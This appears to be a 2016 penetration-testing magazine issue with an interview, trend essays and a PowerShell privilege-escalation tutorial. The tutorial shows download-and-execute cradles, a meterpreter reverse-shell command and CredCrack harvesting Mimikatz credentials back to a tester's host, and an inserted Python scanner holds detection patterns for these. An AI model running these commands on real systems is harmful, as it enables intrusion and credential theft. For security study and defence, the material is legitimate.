TRENDS IN 2016
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage. All trade marks presented
in the magazine were used only for informative purposes.
All rights to trade marks presented in the magazine are reserved
by the companies which own them.
DISCLAIMER!
The techniques described in our articles may only be used in
private, local networks. The editors hold no responsibility for
misuse of the presented techniques or consequent data loss.
Contents
"I think it is a great space to be in right now and for the future": interview with Kai Pfiester, founder of Black Cipher Security
by Martin Brough
by Tom Updegrove
KAI PFIESTER
[PT]: And now, when you are working in the field, did reality meet the expectations?
[KP]: Reality has definitely met my expectations. I love my job and feel I have found what I was born
to do. I am a chess player and I love a good challenge that forces me to think outside the box.
Penetration testing and cyber security are, in my humble opinion, some of the most challenging fields to
work in, since they are so dynamic.
[PT]: What kind of challenges did you face while creating your company?
[KP]: There were, and still are, many challenges in starting my own company. For starters, I thought
I wouldn't have to really sell anything. With all the hacking and data breaches at the time, I sincerely
believed that other businesses would come running to me for help. However, that was not the case
as most business owners that I encountered didn't think they were even worth a hacker's attention.
So the primary challenge for me to this day is getting business owners to realize the need for
an effective information security plan. The next big challenge for me was to deal with all the other
aspects of running your own business such as contracts, website design, marketing, business
development, partnerships, taxes, etc., that come with being an entrepreneur. I am a technical person
and so I had to learn all of the other stuff as I went along.
[PT]: Your company provides services for small and medium companies. Do you find more firms
are becoming aware of cyber-attacks?
[KP]: Due to the media coverage, yes, more firms are becoming aware of the proliferation of cyberattacks.
However, they tend to still think that it won't happen to them or that they haven't been hacked
yet. However, most are not keeping and monitoring logs so unless there is some blatant evidence of
a breach, they have no way of knowing if they've been compromised or not.
[PT]: What do you think are challenges for firms who are between small companies and major
corporations?
[KP]: In my opinion the major challenges they face are deciding whether they need to outsource their IT
security in order to keep costs down versus having their own in-house information security team. As we
all know, if you have data and / or resources worth the attacker's attention, you will be targeted at some
point.
[PT]: From your own experience, do you prefer to work with smaller or bigger companies?
[KP]: I prefer to work with smaller companies as there is less bureaucracy and you can get to the heart
of the matter (securing their infrastructure) quickly.
[PT]: What are your general thoughts about the development of the cyber security market?
[KP]: I think it is a great space to be in right now and for the future. When you consider how IT
is interwoven into almost every aspect of a person's daily life, it is easy to see how crucial IT security
is and will be. From IoT to mobile apps to social media to corporate and government networks, the
cyber security market is going to thrive well into the future.
[PT]: As a person who knows penetration testing tools a lot, do you think there are going to be
any breakthrough changes in technology?
[KP]: Absolutely! I think it is only a matter of time before quantum computers will be able to crack RSA
encryption pretty quickly. Multi-factor authentication based on physical and / or behavioral traits seems
to be the best approach to truly securing things. For instance, the banking industry is seriously
considering using a person's heartbeat to authenticate before granting access to certain financial
services.
[PT]: There seems to be a very strong push to get rid of passwords and replace them with more
reliable solutions. What do you think about that? Is that a move in the right direction?
[KP]: I completely agree that we need to get rid of passwords once and for all as a form of single-factor
authentication. They can stick around if we use them only in multi-factor authentication scenarios. VCRs
and video tapes were great when they first came out. They served their purpose well. But then came
DVDs and now we are streaming video directly to our screens. Passwords are in the same boat. With
super-powerful GPU-based password cracking machines, freely available wordlists, rainbow tables, etc.,
many common passwords can be cracked within a week to ten days. If passwords are accompanied by
some form of two-factor authentication the account they are protecting is pretty safe. But I imagine it
is only a matter of time before that obstacle is overcome.
[PT]: Can you tell us what is changing in terms of recruiting pen testers or cyber security
specialists? Do you find it's going to be harder to find a job in this area?
[KP]: I recently discovered a website called stealthworker.com that specializes in recruiting and staffing
for cyber security. I imagine that there will be other sites like it and eventually there will be a clearing
house, so to speak, where you can find the talent that you are looking for. As for finding a job in this
area, no, I don't think it is going to be harder. You cannot go wrong by specializing in IT. You can almost
always find a job. As for the cyber security market, if you have the skills, there will always be work.
Especially in the government sector.
[PT]: Every day we can hear about new attacks. How do you see cyber threats evolving in the
near future?
[KP]: As cyber security product vendors make products better at detecting the subtlest attacks,
attackers will be forced to evolve their attacks as well as their skillset. The human factor is always going
to play a part since humans are the ones that can make the greatest security technology in the world
completely useless by not configuring it correctly or by being social-engineered to turn it off.
Leveraging PowerShell in Windows is also a growing attack vector as it does not trip AV. So I imagine
using a system's tools against itself will also play a part in the types of attacks we see a lot of in the
future.
[PT]: Following the previous question, do you find the tools we have are good enough to ensure
complete protection of a company?
[KP]: The primary weaknesses in cyber security are threefold: humans, technology and processes. There
is great security awareness training available for people so that is covered. There are also highly effective
data security technologies as well as policies that govern how IT equipment and data should
be handled. So what, then, is the problem? The problem is that rarely are all three of these factors
implemented together into a solid cyber security defense strategy. When they are, a data breach is
an extremely rare occurrence, if it ever is.
[PT]: Have you got any final thoughts about trends in penetration testing and vulnerability
analysis in 2016?
[KP]: As more and more people get into the field we are going to see some really cool tools
be developed. I also think we are going to see more frameworks like SET and Metasploit be released.
When parents have only one child, that child has no one to learn from. Most of his or her knowledge
comes from single-handed experience. But the next child born into the family not only learns from their
own experience, but learns from the other child as well. So the second child's skillset develops faster
than the first child's skillset. We have the same situation with pen testing and vulnerability analysis
as well. These fields are young and the elders have set the stage with all their hard work and
contributions. But I think the younger generation is going to improve and build upon the current
foundation and develop tools that will be super effective in bypassing today's defense technologies.
[PT]: Do you have any thoughts or experiences you would like to share with our audience? Any
good advice?
[KP]: Never be so arrogant that you think you are unhackable or not worth an attacker's time
or attention. I once had a business lead at a certain company and after talking to the company's IT guy,
he basically told me that he had all the company's cyber security under control. At that point, I said OK
and let it be. Six weeks later I get a call from him. He was in panic mode because his network had been
hacked. They noticed more bandwidth than normal was being eaten up and tracked it to a specific
server. Upon further investigation it had been hacked and was turned into a spam server. After checking
the timestamps on certain files, it was determined that his network was hacked prior to, and during, the
time he told me that he had all the network's security under control and didn't need my help.
True security requires humility and constant vigilance.
One of the predictions in 2016 is that it will be a year of Hacking the Code. Not the Da Vinci Code:
computer code. This code contains vulnerabilities and it is being exploited through its underlying
integrations and connections to various enterprise-class systems.
The second prediction is that we will be seeing cybersecurity and incident response automation.
This relates to the notoriously error-prone nature of the human beings who, despite genuine talent,
create the automation and digital world we know today.
positives. Tools that provide learning capabilities are, however, still far from what the popular terms
machine learning and intelligence suggest.
As new tools and utilities are being introduced to help automate penetration testing tasks to a degree
that would not have been possible just a few years ago, application complexity, technologies,
and trends evolve exponentially with them. Although automation continues to be essential for
pentesters, the challenges remain the same: every application is different, and tools depend heavily on
user direction, since they cannot understand context and semantic meaning, have no intuition, and
cannot improvise or adjust strategy.
Pentesting strategies are now being converted from a once-a-year exercise into annual programs, where
secure code review, static and dynamic, is combined with perhaps quarterly penetration tests
of targeted areas. The financial sector, in particular, considers penetration testing an annual product
rather than a one-time service. Professional firms use human intellect and tools to set up whole
cybersecurity code exploitation and development practices with emphasis on testing components.
Effective penetration testing teams will consist of 3-5 highly trained professionals and specialists,
executing the pentest assignment with well-rehearsed scrum efficacy, communication, division of tasks,
re-prioritizing backlog, tracking, addressing new issues, strategically re-focusing to maximize the value
of both the individual and the team contribution, committing to and owning the project from start to
completion. Teams adopting lean methodologies would typically achieve a velocity of at least double
that of isolated individual contributors of the same background.
New skillsets will be required in various emerging areas of penetration testing:
Mobile Devices - iOS, Android, or Windows based native applications, as well as a hybrid application
assessment will become more and more important as the use of mobile devices will be gradually
shifting from entertainment to business use and processing financial and other sensitive data.
Cloud and virtualization - software-defined network technology is new and changing rapidly - also
changing is its threat landscape. This will require adjusting pentesting techniques with a matching
speed.
Internet of things, embedded systems, pentesting/reverse engineering - office and home
automation, vehicles, medical, payment, industrial control systems, switches, power converters, circuit
breakers, and other devices are being connected to networks and therefore exposed to possible
attacks - they all will need new and improved tools and approaches.
Ever evolving modern JavaScript based web applications - to assess security of such applications
there will be a need to combine the classic crawling and scanning with a web browser engine,
JavaScript debugger, forward/backward tracer, unpacking/de-obfuscation snapshots comparer, a script
based state/variable alerting, injecting and fuzzing.
Wireless systems - Software-defined radio (SDR) based wireless security assessments, WiFi, smart
meters, wearable devices, etc. - all this will require specific tools and skillsets.
Machine learning - based anomaly detection will keep improving. Unfortunately, so do countermeasures.
Internal network pentesting - will be used more as companies realize that to penetrate their internal
networks using social engineering is a real possibility.
Social engineering - as a part of pentesting, in the foreseeable future, we don't see
a possibility that an automated robot can get to a company building and ask somebody to "print his
resume" from a USB drive.
Remnants of the old era are legacy systems: the plethora of well-humming and rather dated
production deployments out there are great examples of the need for pentesters. These systems will
continue to require pentesting, which will not deviate greatly from currently proven methodologies, and
a skilled pentester is crucial for those precise, military-sniper missions.
We do believe that in the near future and beyond (at least until the time when applications are fully
developed and auto-improved by autonomous artificially intelligent agents), it will still be the human
genius and intelligence, in-depth understanding, and efficient utilization of automated tools, which will
determine the most successful pentesting outcomes. Terminator is an interesting concept and a movie;
only time will show how far artificial intelligence will get and if the human genius will replace itself with
fully automated systems. Do not forget that, in the present day, it is the human hacking skillset that has so far
won the race against machines.
JARO NEMCOK
Web Security Researcher at LIFARS LLC, an international cyber security and
digital forensics firm. He started his career in software development with
focus on security and later moved to Information Security, focusing
on system audits, security/risk assessments, penetration testing, incident
response to hacked web applications, and overall security.
He has almost two decades of cybersecurity experience, including
vulnerability assessment, secure code review, cloud-based penetration
testing, digital risk assessment, digital evidence acquisition, investigation
of web attacks, security assessments of Internet-facing applications,
penetration tests across internal networks, development of testing scripts
and procedures, and digital forensics. Jaro worked on many high-profile
cases, including a much publicized Box.com and Dropbox leakage.
ONDREJ KREHEL
CEO and Founder of LIFARS LLC, an international cybersecurity and digital
forensics firm. With over two decades of experience in computer security and
forensics, he conducted a wide range of investigations, including data
breached through computer intrusions, theft of intellectual property, massive
deletions, defragmentation, file carvings, anti-money laundering, financial
fraud, mathematical modeling and computer hacking.
Ondrej's experience also includes advanced network penetration testing,
database security testing, physical security assessments, logical security
audits, wireless network penetration testing, and providing recommendations
for operational efficiency of approaches. He is one of the few security experts
in the world holding the Certified Ethical Hacker Instructor Certification (CEI).
Ondrej worked on many high-profile cases, including a much publicized
Privilege escalation is a task that proves difficult at times. In the past, one would rely heavily
on Metasploit as the full exploitation suite. With Metasploit, one would not only be able to exploit
a vulnerability but quickly elevate privileges with the getsystem command. However, with the
landscape of cybersecurity constantly changing, it was only a matter of time before network
administrators implemented new technological advancements that would detect and prevent
most Metasploit payloads. With one of pentesters' favorite tools now being detected, pentesters
needed to find an alternative solution.
Welcome to the new era of pentesting, an era where dropping binaries onto victim systems is no longer
required. An era where one can execute shellcode or obtain credentials in the clear without touching
the file system. Welcome to the era of pentesting with PowerShell.
This article aims to provide a technical introduction on how to use PowerShell to quickly escalate
privileges on Windows operating systems.
THE WORLD OF POWER SHELL
Since its release in November of 2006, PowerShell has facilitated the jobs of several Windows
administrators. With an array of methods and functionalities, PowerShell is much more powerful and
diverse than its predecessor, the command prompt.
However, despite PowerShell's diverse functionality, there is one method that catches the eyes of
pentesters: the DownloadString method.
The DownloadString method is present in PowerShell version 2.0 and forward. When used,
DownloadString downloads the contents of a webpage into a string. If the string downloaded happens
to be a PowerShell script then this can be executed. The best part? The execution would run
in memory, thus bypassing most security products and PowerShell's script execution policy.
To demonstrate the DownloadString functionality, I created a simple PowerShell script named
ipconfig.ps1 and ran it on a fully patched Windows 10 operating system. The ipconfig.ps1 script
identifies the version of PowerShell running and runs ipconfig.
Table 1: ipconfig.ps1 script contents
# Report the major PowerShell version, then run ipconfig
$ver = $PSVersionTable.PSVersion.Major
"You are using PowerShell version " + $ver
ipconfig
There is an error when the script is run locally since PowerShell's execution policy is set to Restricted.
This means that no PowerShell scripts can be run.
Figure 1: PowerShell execution error
However, if the script is uploaded to a webserver and DownloadString is used, PowerShell's execution
policy is bypassed.
Table 2: Example of PowerShell's DownloadString functionality
PS >IEX (New-Object Net.WebClient).DownloadString("http://gojhonny.com/pentestmag/ipconfig.ps1")
Armed with this knowledge, pentesters started creating PowerShell scripts and combining them with
the DownloadString method to bypass security restrictions. Today, two of the most widely used scripts
are the Invoke-Shellcode and Invoke-Mimikatz scripts. Both scripts may be found on
Matt Graeber's GitHub.
INVOKING SHELLCODE IN MEMORY
The Invoke-Shellcode script allows pentesters to execute custom shellcode or payloads like
Metasploit's reverse HTTP. The example below depicts the use of the DownloadString method to
bypass security restrictions and execute a reverse Metasploit HTTP payload in memory. The Invoke-Shellcode
script was placed on a local webserver with the IP of 192.168.146.132.
Table 3: Example of PowerShell DownloadString Invoke-Shellcode command
PS >IEX (New-Object Net.WebClient).DownloadString("http://<pentester_web_server>/Invoke-Shellcode.ps1")
PS >Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost <ip> -Lport <port>
After executing the script on the victim system, one should have obtained a shell as shown in Figure 3.
The ability to execute this script in memory is incredibly powerful for pentesters. Imagine recursively
obtaining the credentials of all systems in a domain. One would be able to obtain domain administrator
credentials in seconds and successfully escalate privileges. This is where CredCrack comes in.
AUTOMATING PRIVILEGE ESCALATION WITH CREDCRACK
Pentesters love automation; in fact, we love automating as many things as possible. Thankfully, there
are tools that have been created to automate exploitation and privilege escalation and make the lives
of pentesters easier. With great tools, such as Empire, PowerUp and CredCrack, one may go from
domain user to domain administrator in seconds. The following section will demonstrate how to use
CredCrack, a popular credential harvesting script.
CredCrack was created and released by myself, Jonathan Broche, in August of 2015. Since then,
it has become a popular tool amongst pentesters and with the online community. CredCrack has two
main functionalities: share enumeration and credential harvesting.
Table 5: CredCrack's help menu
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples:
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
Once domain user credentials have been compromised, it is recommended to use CredCrack's share
enumeration functionality to identify systems the compromised user has administrative access to.
The share enumeration functionality uses the SMB protocol to test shares for write access on the
systems provided. Systems that grant read/write access to their administrative share (C$) indicate that
the user has local administrative access.
Figure 6: Enumerating share access with CredCrack
After using the share enumeration functionality, the pentester would create a list of systems with
administrative access and feed them into CredCrack's credential harvesting functionality.
CredCrack's credential harvesting works by executing the Invoke-Mimikatz script using
PowerShell's DownloadString method against the provided systems. Victims will execute Invoke-Mimikatz
and send the credentials over an HTTP POST request back to the pentester's system.
Figure 7: Illustration of CredCrack sending Invoke-Mimikatz to victim systems
Once Mimikatz has been executed on the victim system through PowerShell, it will send the credentials
in a POST request to the pentester's system.
Figure 8: Illustration of CredCrack sending credentials in a POST request back to the pentester
After all victims have finished the execution of Mimikatz, CredCrack will search for any matches against
the domain administrators list to see if a domain administrator account was obtained and, if so, output
the account's credentials.
Figure 9: CredCrack output
Domain administrator in just 10.9 seconds! CredCrack has proven to be one of the fastest ways to
escalate privileges in large enterprise environments and is just one example of the several powerful
tools available for pentesters today.
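The DownloadString cradle, the Invoke-Shellcode command and CredCrack's Invoke-Mimikatz push described above all leave their text in PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). As an added, defender-side example that is not part of this article or of CredCrack, the Python below scans flattened log lines for exactly those indicators and reports the download URL; the one-line record layout and the sample lines are constructed for this example.

```python
"""Flag PowerShell download cradles and in-memory loaders in script block logs.

Added example, not part of the article or of CredCrack. It assumes PowerShell
script block logging is enabled (Event ID 4104) and that each record has been
flattened to one text line; the record layout and SAMPLE_LOG are constructed.
"""
import re
from dataclasses import dataclass

# Indicator rules: (name, severity, pattern). These are the indicators the
# article describes: an IEX + DownloadString cradle, Invoke-Shellcode with a
# meterpreter payload, and Invoke-Mimikatz. Case-insensitive, as PowerShell is.
RULES = (
    ("invoke_mimikatz", "critical", re.compile(r"\bInvoke-Mimikatz\b", re.I)),
    ("invoke_shellcode", "high", re.compile(r"\bInvoke-Shellcode\b", re.I)),
    ("meterpreter_payload", "high", re.compile(r"windows/meterpreter/reverse_\w+", re.I)),
    ("download_cradle", "high",
     re.compile(r"\b(?:IEX|Invoke-Expression)\b.*\.DownloadString\s*\(", re.I)),
    ("download_string", "medium", re.compile(r"\.DownloadString\s*\(", re.I)),
)
RANK = {"medium": 1, "high": 2, "critical": 3}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# Only script block records (4104) carry the text of the code that ran.
SCRIPT_BLOCK_RE = re.compile(r"\bEventID=4104\b.*?ScriptBlock:\s*(?P<block>.*)$")


@dataclass(frozen=True)
class Finding:
    line_no: int
    severity: str
    rules: tuple
    urls: tuple
    script: str


def scan(lines):
    """Return one Finding per script block line that matches at least one rule."""
    findings = []
    for line_no, raw in enumerate(lines, 1):
        m = SCRIPT_BLOCK_RE.search(raw)
        if not m:
            continue  # not a script block record, nothing to inspect
        block = m.group("block")
        hits = [(name, sev) for name, sev, rx in RULES if rx.search(block)]
        if not hits:
            continue
        # A cradle always contains DownloadString; keep only the more specific rule.
        if any(name == "download_cradle" for name, _ in hits):
            hits = [h for h in hits if h[0] != "download_string"]
        worst = max((sev for _, sev in hits), key=RANK.__getitem__)
        findings.append(Finding(line_no, worst, tuple(name for name, _ in hits),
                                tuple(URL_RE.findall(block)), block))
    return findings


def summarize(findings):
    """Count findings per severity so totals can be alerted on or asserted."""
    counts = {"medium": 0, "high": 0, "critical": 0}
    for f in findings:
        counts[f.severity] += 1
    return counts


# Constructed sample log: a benign script, the article's cradle and
# Invoke-Shellcode sequence, a Mimikatz one-liner, a non-4104 record and a
# plain download with no IEX. 192.0.2.10 is a documentation address.
SAMPLE_LOG = [
    "2016-02-01T10:02:11Z host=WS01 EventID=4104 user=ACME\\bob ScriptBlock: $ver = $PSVersionTable.PSVersion.Major",
    "2016-02-01T10:02:12Z host=WS01 EventID=4104 user=ACME\\bob ScriptBlock: ipconfig",
    "2016-02-01T10:05:40Z host=WS01 EventID=4104 user=ACME\\bob ScriptBlock: IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/Invoke-Shellcode.ps1')",
    "2016-02-01T10:05:41Z host=WS01 EventID=4104 user=ACME\\bob ScriptBlock: Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 192.0.2.10 -Lport 8080",
    "2016-02-01T10:06:02Z host=SRV07 EventID=4104 user=ACME\\svc_backup ScriptBlock: iex (new-object net.webclient).downloadstring('http://192.0.2.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz",
    "2016-02-01T10:06:03Z host=SRV07 EventID=4103 user=ACME\\svc_backup CommandInvocation: Get-ChildItem",
    "2016-02-01T10:09:15Z host=WS02 EventID=4104 user=ACME\\alice ScriptBlock: $txt = (New-Object Net.WebClient).DownloadString('http://intranet.example/motd.txt')",
]

if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        urls = ", ".join(f.urls) or "-"
        print(f"line {f.line_no}: {f.severity:8} {', '.join(f.rules)} urls={urls}")
    print(summarize(results))
```

Feed it real 4104 records (for example exported with Get-WinEvent and flattened to one line each) to triage hosts where the cradle and Invoke-Mimikatz appeared together, which is the sequence CredCrack's harvesting produces on every target.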
CONCLUSION
There are several ways to escalate privileges on a network and the aforementioned tools are just
a handful of them. The cyber security landscape is always changing and there is always something to
be learned. Try the methodologies mentioned in upcoming pentests and do not be discouraged from
researching new methodologies and building the next best tool!
In regulated industries, it has become common practice for management to assume that
compliance and security are one and the same. They believe that because an auditor has marked
them as being compliant, there are no further actions that need to be taken to secure their
systems. The idea that because something is compliant, it must also be secure has become an
inside joke among security professionals; unfortunately, those same professionals are often
incapable of translating to management exactly why a compliant system is not necessarily
secure.
INTRODUCTION
In January of 2011, the United States Government Accountability Office (GAO) reported to Congress that
"Utilities are focusing on regulatory compliance instead of comprehensive security" and that "security
requirements are inherently incomplete, and having a culture that views the security problem as being
solved once those requirements are met will leave an organization vulnerable to cyber-attack." It is not
only utilities that suffer from this problem; in the last 18 months, over 150 million credit card numbers
and protected health records have been stolen from companies that had all been found compliant
in their most recent assessments. Companies like Target, JP Morgan, Home Depot, and Neiman Marcus
(to name only a few) have learned just how short of true security a compliant program can leave you.
THE ROLE OF THE PENETRATION TESTER
Most experienced penetration testers know the feeling of arriving on site to a new client and having the security administrators almost beg to have their systems compromised. They are aware of how vulnerable they are, but have been unable to secure the budget to do anything about it. They believe that the only way to do so is for the penetration test report to show management exactly how secure their compliant system is. Oftentimes, throughout the drafting of the report, the security administrators will request specific wording or recommendations that they believe will help them convince their management team that something more needs to be done.
It is no secret that many companies value third party input much more highly than they do internal recommendations. A request that has been made multiple times by a security team may suddenly be fulfilled if it comes as a recommendation in a third party report.
As such, it is often the responsibility of the penetration tester to identify the areas where management has been lax in assigning resources and prioritize their recommendations accordingly. If it is clear that large amounts of the security budget are being directed towards a brand new Security Incident and Event Manager (SIEM), but the security staff doesn't have the knowledge or training to support that SIEM, it is important for the penetration tester to recognize this and recommend training for the security staff.
However, it is also important for the penetration tester to be aware of and knowledgeable about the regulations with which their client must comply. Writing a report that recommends changes that fall far outside the scope of the client's compliance needs is as likely to create meaningful change as not writing the report at all. On the other hand, if the report can be aligned with the client's compliance goals, it becomes far more likely that management and the security team will utilize it to achieve not only greater security, but also stronger compliance.
as complete or compelling as one written by a HIPAA expert--to say nothing of a penetration tester who
has no compliance knowledge at all. The ability to custom tailor report findings towards specific
compliance burdens will allow penetration testers to better serve their clients and help increase the
overall level of security from compliance-driven entities.
Many large organizations use a system integrator (SI) to provide their IT infrastructure and
associated services. There is also a growing trend to use multiple suppliers to deliver the holistic
service that was once provided by a single SI. In either case, using SI(s) can significantly impact
the efficacy of Penetration Testing unless the issues are recognized and managed early on by the
organization being tested.
Penetration testing is typically performed for a set number of reasons, often at pre-determined intervals
and for pre-determined in-scope systems. Other testing may occur ad-hoc as required after significant
changes to the environment.
Pre-determined testing is again sub-divided into evaluating security weaknesses with the intention
of maintaining a good level of protection, or as part of a regulatory requirement for annual testing such
as PCI. How effective the penetration testing is may be highly dependent on the type of engagement the
organization has with the SI and not necessarily the SI itself.
A good example here is based on our experiences of IBM, Fujitsu, CGI and others. The SIs themselves
all have the skills and capability to offer a highly effective all-round service delivering on the promises set
out when a contract is negotiated. However, depending on the contract negotiated, the organization will
receive different levels of service highly correlated to the value of the overall contract with the
SI (basically - you get what you pay for). So, while at a high level and on paper the services provided in the
bundle by the SI, like Penetration Testing, may look comprehensive and tick all the right boxes,
do they really deliver what the organization needs?
In our example above, the SI may deliver the regular penetration tests on time and per the pre-defined
scope, generally satisfying the term of the contract but not necessarily satisfying the need to effectively
secure the organization and to assure full compliance against any regulatory requirements. Gaps only
become apparent once the organization actually looks more deeply at the nature of the testing, how
it was initiated and performed.
It is important to regularly ask questions of the SI such as how deep was the testing and how was the
scope validated? When you look at the small print of what was actually agreed, you may find the level
of testing agreed to was actually only superficial and mostly automated scanning, hardly real
penetration testing at all. This may be far below the actual capability of the SI, and maybe they did not
engage their top-tier testers or allow as much time as required to do a truly effective job at identifying the
more subtle issues. Unless the organization employs specialists who examine or validate the level
of testing, there may be an assumption that everything is fine as penetration testing is completed
regularly.
Scope is another important factor. The SI will typically be very good at keeping a complete and up
to date list of all the assets being managed, as that is effectively their only way of accurately calculating
the service costs, so it is in their interests to manage that list well. What the asset list does not do,
however, is keep a true track of what should be part of annual testing. From a PCI perspective, maybe
it is effective as long as the organization has kept the SI informed of which applications or data sets
may be considered as within a PCI scope. This is not always something that is as black and white as
it should be, for not all organizations have cleanly defined network scopes or security zones. For those
organizations where a PCI scope may bleed into other networks due to applications being connected to
the PCI zones, unless the SI and the organization are both synchronizing their view of PCI scope, things
may be lost in translation. This can leave some potentially valuable PCI targets out of scope for the
annual testing. The SI may continue to deliver per the contract and report all is well, and the organization
may assume all of PCI is being regularly tested as the loss of synchronization of asset details goes
unnoticed. It is not until there is a breach, or possibly worse still, the PCI auditor questions why some
systems were missed out, that the organization becomes aware of this situation. The same scenario
applies to critical systems which contain confidential data, etc. The organization must ensure the scope
the SI is working to is kept up to date so the right systems get tested, and it is not generally the
responsibility of the SI to pro-actively obtain this information.
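One way for the organization to keep its own view of scope, as an added example that is not part of the article: the script below expands the declared PCI zones by the systems connected to them (the "scope bleed" described above) and compares the result with the asset list the SI reports as tested. All hosts, zones, connections and the SI's tested list are constructed sample data.

```python
"""Reconcile the organization's PCI scope with what the SI actually tested.

Added example, not from the article.  The organization declares which zones
are PCI, a map of which systems connect to which, and receives the SI's list
of tested assets.  Systems connected to a PCI zone are pulled into scope, and
any in-scope system the SI did not test is reported, together with tested
hosts that no longer appear on the organization's own register.
"""
from typing import Dict, Iterable, List, Set, Tuple

# Constructed asset register: host -> zone the organization assigned it to.
ASSET_REGISTER: Dict[str, str] = {
    "pos-gw-01": "pci-cde",
    "pos-gw-02": "pci-cde",
    "card-db-01": "pci-cde",
    "erp-app-01": "corp-apps",
    "erp-db-01": "corp-apps",
    "hr-portal": "corp-apps",
    "wiki": "corp-apps",
}

# Constructed connectivity: "A talks to B" links between hosts.
CONNECTIONS: List[Tuple[str, str]] = [
    ("erp-app-01", "card-db-01"),   # ERP pulls settlement data out of the CDE
    ("erp-app-01", "erp-db-01"),
    ("hr-portal", "wiki"),
]

# Constructed: what the SI reported as tested in the last annual round.
# "legacy-pos-09" was decommissioned and is no longer on the register.
SI_TESTED: Set[str] = {"pos-gw-01", "pos-gw-02", "card-db-01", "erp-db-01",
                       "legacy-pos-09"}


def effective_pci_scope(register: Dict[str, str],
                        connections: Iterable[Tuple[str, str]],
                        pci_zones: Iterable[str],
                        max_hops: int = 1) -> Set[str]:
    """Hosts in a PCI zone plus hosts within max_hops connections of one.

    Links are treated as undirected: a system that can reach the CDE, or be
    reached from it, counts as connected.  PCI DSS places directly connected
    systems in scope (max_hops=1); a larger value is an analyst's choice for
    organizations whose zones are not cleanly segmented.
    """
    adjacency: Dict[str, Set[str]] = {}
    for a, b in connections:
        adjacency.setdefault(a, set()).add(b)
        adjacency.setdefault(b, set()).add(a)
    zones = set(pci_zones)
    scope = {host for host, zone in register.items() if zone in zones}
    frontier = set(scope)
    for _ in range(max_hops):
        reached: Set[str] = set()
        for host in frontier:
            reached |= adjacency.get(host, set())
        reached -= scope
        if not reached:
            break
        scope |= reached
        frontier = reached
    return scope


def scope_gaps(register: Dict[str, str],
               connections: Iterable[Tuple[str, str]],
               tested: Set[str],
               pci_zones: Iterable[str] = ("pci-cde",),
               max_hops: int = 1) -> Dict[str, List[str]]:
    """Report in-scope hosts the SI never tested, and tested hosts the
    organization no longer tracks (a sign the two asset lists have drifted)."""
    scope = effective_pci_scope(register, connections, pci_zones, max_hops)
    return {
        "untested_in_scope": sorted(scope - tested),
        "tested_not_registered": sorted(tested - set(register)),
    }


if __name__ == "__main__":
    for key, hosts in scope_gaps(ASSET_REGISTER, CONNECTIONS, SI_TESTED).items():
        print(f"{key}: {', '.join(hosts) or 'none'}")
```

Run against the constructed data, the report flags erp-app-01 as in scope but untested, and legacy-pos-09 as tested by the SI but absent from the organization's register.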
Regulatory requirements are also evolving and generally this tends towards stricter security controls
which can result in additional complexity. Introducing a requirement to perform authenticated testing, for
example in PCI v3, creates a need to perform Penetration Testing in a very different way on some
systems. For applications that require authentication, it can be very difficult to obtain credentials for the
SI Penetration Testers, or there may be other complexities due to conflicting regulatory requirements
around who can get access or how the access must be provided. If this is a new requirement that
the organization has never previously had to deal with, especially outside of its pre-production testing
networks, sometimes a new end-to-end facility to permit authenticated testing must be created. All of this
will take time. The contract between the organization and the SI may simply not accommodate this at all,
but the time to find this out is not a few weeks before the regulatory audit is due!
When outsourcing such things as Penetration Testing to an SI, there is often an implicit level of trust and
the service is not generally questioned. Service reporting is often all green indicating all deliverables are
on track; after all, that's what you pay an SI for: to deliver the contracted service on time. You don't
generally get an independent attestation as to quality, or careful validation that it is meeting the real
security requirements of the organization. Few SIs pro-actively deliver this kind of service and it is
incredibly important for the organization to either employ people with the necessary skills to validate the
quality and scope of penetration testing, or to regularly dip-test by using an independent Penetration
Testing organization who can provide a baseline to identify service gaps.
If you are to avoid the pitfalls caused by implicit trust in the services delivered by an SI, and to maximize
the actual deliverables, then the governance over the scope and quality of testing should never
be outsourced directly to the SI. That and the growing pressures of regulatory compliance, especially
PCI, may mean it's time to renegotiate the contract with the SI and to seek a regular independent view
to ensure they stay on track.
Pentesting is truly an art form that I have studied for most of my life; however, pentesting
is a dying art form that needs to be resuscitated! I don't mean that people are no longer using
pentests; in fact, it's just the opposite.
I have noticed that over the past five years, annual pentesting is working its way from being thought
of as something you just do to meet (enter acronym here) compliance to standard IT security practice.
Within the past two years, I have noticed a significant increase in companies adding annual pentests
into their contracts with companies that handle their data. Companies that offer services such as SaaS,
cloud data storage, outsourced web development and media management are now all being required
by contract to participate in both annual audits of their systems and penetration tests to ensure their
data is secure. So what do I mean by pentesting is a dying art form? I mean that pentesting is
a highly skilled practice and should be conducted by professionals who have been trained and know
what they are looking for and how to test your company's systems. It seems that every script-kiddie
with a Kali box these days will tell you they are a pentester! A true pentest cannot be done from a box
of automated tools; it involves a ton of research, analytics, scanning, probing, watching, social
engineering, oh and yeah exploitation! When I was growing up, if you wanted to learn to be
a pentester or how to find vulnerabilities in software or hardware, you needed to be a member of small
groups that did that as a hobby. Penetration testing used to be viewed as hacking and hackers have
always been close-knit groups that don't share a lot unless you are vetted. Online video resources, like
YouTube, I feel have changed that a lot. If you want to know what command to run in Nikto
or Nmap, then just Google it and find a tutorial that some other teenager posted after watching another
teenager do it. I am excited to see the direction that pentesting is taking as far as being accepted on
a corporate level because it says to me that people are starting to care about their data and what it's
doing.
